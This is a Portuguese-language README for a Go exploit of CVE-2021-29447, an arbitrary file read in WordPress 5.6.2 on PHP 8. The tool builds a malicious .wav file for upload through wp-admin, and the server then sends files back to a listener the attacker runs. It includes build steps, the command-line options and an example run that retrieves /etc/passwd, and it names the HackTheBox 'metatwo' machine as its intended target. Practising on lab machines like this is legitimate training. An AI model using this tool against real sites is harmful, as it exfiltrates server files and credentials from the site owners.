
Exploit baseado em Go para CVE-2021-29447, direcionado ao WordPress 5.6.2 com PHP 8. Gera um payload .wav malicioso para recuperar arquivos arbitrários do servidor através do upload de mídia, exigindo acesso básico ao wp-admin.
Apenas para fins educacionais.
Este exploit é uma ferramenta muito conveniente para obter qualquer arquivo de um servidor executando WordPress 5.6.2 e PHP8. (veja https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)
Tudo que você precisa é de acesso básico ao wp-admin e capacidade de enviar um arquivo de mídia.
O exploit gerará um payload de arquivo .wav para enviar usando o wp-admin.
Em seguida, ele usa o servidor de retorno do exploit para fornecer o arquivo desejado diretamente no seu console.
O uso perfeito é na máquina do HackTheBox - metatwo https://www.hackthebox.com/machines/metatwo

$ go build
$ chmod +x exploit_cve-2021-29447
$ ./exploit_cve-2021-29447 --help
Usage of ./exploit_cve-2021-29447:
-local-server-ip string
Use local server ip where a local server will be set
-local-server-port int
Use local server port to run local server on
-o string
Output file to save exploit's result
-target-path string
Use target path to point on file you want to get from target server
$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd